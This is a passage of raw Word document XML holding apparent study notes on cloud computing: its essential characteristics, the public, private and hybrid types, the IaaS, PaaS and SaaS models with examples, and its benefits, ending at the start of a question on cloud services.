          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>On-demand self-service</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Access resources like storage and computing power without human interaction with the service provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B18F5" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Broad network access</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Services are available over the network and accessed through standard mechanisms (like browsers or APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A94494" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resources (CPU, storage, etc.) are pooled and shared among multiple users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B87F82" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rapid elasticity</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resources can be scaled up or down automatically based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900A2B3" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Measured service</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Usage is monitored and billed based on consumption (pay-as-you-go model).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E97CE" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="00000000" w:rsidP="001050F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D32560">
          <v:rect id="_x0000_i3434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C26718" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types of Cloud Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9D278" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Public Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Services offered over the public internet (e.g., AWS, Azure, Google Cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C1BC3" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Private Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Cloud infrastructure operated solely for a single organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91DD55" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hybrid Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – A mix of public and private clouds that allows data and apps to move between the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4E962" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="00000000" w:rsidP="001050F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64DB50F">
          <v:rect id="_x0000_i3435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE43776" w14:textId="77777777" w:rsidR="00C632D7" w:rsidRDefault="00C632D7" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDA36D5" w14:textId="2344A114" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloud Service Models:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776683C" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IaaS (Infrastructure as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provides virtualized computing resources over the internet.</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS EC2, Azure Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489C480" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PaaS (Platform as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provides a platform to develop, run, and manage applications.</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Google App Engine, Azure App Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74444241" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SaaS (Software as a Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Delivers software applications over the internet on a subscription basis.</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gmail, Microsoft 365, Salesforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEBD0F" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="00000000" w:rsidP="001050F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27CA7A">
          <v:rect id="_x0000_i3436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F97D59F" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Benefits of Cloud Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB0144" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cost-efficient (no need for heavy upfront hardware investment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C52A3" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scalable and elastic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B1541" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>High availability and reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B1084" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enables remote work and collaboration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058570C0" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simplifies disaster recovery and backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA2D1FA" w14:textId="60774105" w:rsidR="000417BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000417B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0FACC29">
          <v:rect id="_x0000_i3437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9258A0" w14:textId="47804BDF" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00954F7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="850" w:name="_Toc196308330"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain services provided by cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>
    </w:p>
    <w:p w14:paraId="32922C19" w14:textId="0C03FB38" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00D530AD" w:rsidP="00C632D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">Cloud computing provides a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
